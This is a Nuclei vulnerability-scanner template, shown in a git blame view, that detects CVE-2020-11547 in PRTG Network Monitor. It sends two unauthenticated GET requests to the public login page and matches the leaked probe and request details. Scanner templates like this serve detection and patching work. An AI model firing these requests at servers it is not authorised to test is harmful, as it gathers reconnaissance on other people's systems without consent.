nuclei-templates/cves/2020/CVE-2020-11547.yaml

40 lines
1.2 KiB
YAML
Raw Normal View History

2021-09-02 11:43:37 +00:00
id: CVE-2020-11547
info:
name: PRTG Network Monitor < 20.1.57.1745 - Information Disclosure
author: x6263
severity: medium
description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request.
2021-09-02 12:55:16 +00:00
reference:
2021-09-02 11:43:37 +00:00
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
2021-09-02 12:55:16 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
- https://github.com/ch-rigu/PRTG-Network-Monitor-Information-Disclosure
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-11547
cwe-id: CWE-200
tags: cve,cve2020,prtg,disclosure,network
2021-09-02 11:43:37 +00:00
requests:
- method: GET
path:
2021-09-02 12:55:16 +00:00
- "{{BaseURL}}/public/login.htm?type=probes"
- "{{BaseURL}}/public/login.htm?type=requests"
req-condition: true
matchers-condition: and
2021-09-02 11:43:37 +00:00
matchers:
2021-09-02 12:55:16 +00:00
- type: dsl
dsl:
2022-06-30 11:19:17 +00:00
- "contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"
2021-09-02 12:55:16 +00:00
2021-09-02 11:43:37 +00:00
- type: word
2022-06-30 11:19:17 +00:00
part: body
2021-09-02 11:43:37 +00:00
words:
2021-09-02 12:55:16 +00:00
- "prtg_network_monitor"
2021-09-02 11:43:37 +00:00
- type: status
status:
- 200